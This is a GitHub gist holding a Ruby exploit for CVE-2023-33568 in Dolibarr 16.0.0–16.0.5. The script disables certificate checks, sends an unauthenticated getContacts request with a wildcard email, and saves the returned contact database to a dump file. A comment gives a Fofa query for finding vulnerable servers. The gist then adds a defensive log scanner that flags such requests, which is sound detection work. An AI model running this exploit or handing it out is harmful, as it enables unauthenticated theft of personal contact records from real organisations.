@komodoooo
Created June 24, 2023 18:56
CVE-2023-33568 exploit
require 'http'
require 'openssl'

puts """
CVE-2023-33568
Dolibarr 16.0.0 to 16.0.5 unauthenticated DB access exploit
By komodo\n
"""
=begin
Exploit works only if a contact file exists on the vulnerable target.
Fofa query to search vulnerable targets:
app="Dolibarr"&&(body="16.0.0"||body="16.0.1"||body="16.0.2"||body="16.0.3"||body="16.0.4"||body="16.0.5")
=end
$cont=1
$dirname="Dolibarr_dump"

# Create the output directory and change into it.
# If the name is already taken, retry with a numeric suffix.
def dir(name=$dirname)
  begin
    Dir.mkdir(name)
    Dir.chdir(name)
  rescue Errno::EEXIST
    $cont+=1
    dir("#{$dirname}-#{$cont}")
  end
end

def main(url)
  # Drop a trailing slash so the request path is not doubled.
  url = url.delete_suffix("/")
  # Certificate verification is disabled for the request.
  @ctx = OpenSSL::SSL::SSLContext.new()
  @ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
  r=HTTP.get("#{url}/public/ticket/ajax/ajax.php?action=getContacts&email=%",:ssl_context=>@ctx)
  body = r.body.to_s
  # A vulnerable target answers with a non-empty {"contacts":[...]} array.
  if body[0..0xc]=='{"contacts":['&&body[0xd]!="]"
    dir()
    # File.write closes the handle, so both files are flushed to disk.
    File.write("!target.txt", url)
    File.write("db_dump.json", body)
    puts "Database dump saved on '#{Dir.pwd.split("/")[-1]}/db_dump.json' file."
  else
    puts "Not vulnerable! :(\n"
  end
end

begin
  print "Base URL: "
  main(gets.chomp)
rescue => e
  abort(e.to_s)
end
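
For defenders, the request this script sends leaves a recognisable trace in web access logs. The following is an added example, not part of the original gist: it scans combined-format access log lines for `getContacts` requests whose `email` value carries the `%` wildcard, and separates probes from responses that returned data. The log format, the sample lines and the 15-byte empty-response threshold are assumptions.

```ruby
# Added example (defensive): the sample log lines below are constructed.
ENDPOINT = "/public/ticket/ajax/ajax.php"
# Assumption: an empty answer is exactly {"contacts":[]} (15 bytes), so a
# larger uncompressed 200 body means contact rows were returned.
EMPTY_RESULT_BYTES = '{"contacts":[]}'.bytesize
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?<target>\S+) [^"]*" (?<status>\d{3}) (?<bytes>\d+|-)/

# Decode by hand: URI.decode_www_form_component raises on a bare "%",
# which is exactly what this request carries.
def pct_decode(str)
  str.b.tr("+", " ").gsub(/%(\h\h)/) { $1.hex.chr }.force_encoding("UTF-8")
end

def query_params(query)
  query.to_s.split("&").to_h do |pair|
    key, value = pair.split("=", 2)
    [pct_decode(key.to_s), pct_decode(value.to_s)]
  end
end

# Returns nil for unrelated lines, otherwise a hash describing the request.
def classify(line)
  m = LOG_RE.match(line) or return nil
  path, query = m[:target].split("?", 2)
  return nil unless path.end_with?(ENDPOINT)
  params = query_params(query)
  return nil unless params["action"] == "getContacts"
  wildcard = params["email"].to_s.include?("%")  # SQL wildcard, not an address
  leaked = m[:status] == "200" && m[:bytes].to_i > EMPTY_RESULT_BYTES
  verdict = if wildcard && leaked then :data_returned
            elsif wildcard then :probe
            else :lookup
            end
  { ip: m[:ip], email: params["email"], bytes: m[:bytes].to_i, verdict: verdict }
end

def scan(log)
  log.each_line.filter_map { |line| classify(line.chomp) }
end

SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [24/Jun/2023:19:02:11 +0000] "GET /public/ticket/ajax/ajax.php?action=getContacts&email=% HTTP/1.1" 200 48213 "-" "-"
  203.0.113.7 - - [24/Jun/2023:19:02:15 +0000] "GET /dolibarr/public/ticket/ajax/ajax.php?action=getContacts&email=%25 HTTP/1.1" 200 15 "-" "-"
  198.51.100.4 - - [24/Jun/2023:19:05:40 +0000] "GET /public/ticket/ajax/ajax.php?action=getContacts&email=alice%40example.com HTTP/1.1" 200 131 "-" "-"
  198.51.100.9 - - [24/Jun/2023:19:06:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "-"
LOG

scan(SAMPLE_LOG).each { |hit| puts hit } if __FILE__ == $PROGRAM_NAME
```

A `:data_returned` hit against a Dolibarr 16.0.0 to 16.0.5 host means contact records left the server without authentication and should be handled as a data exposure; `:probe` hits show the endpoint was tested without rows coming back.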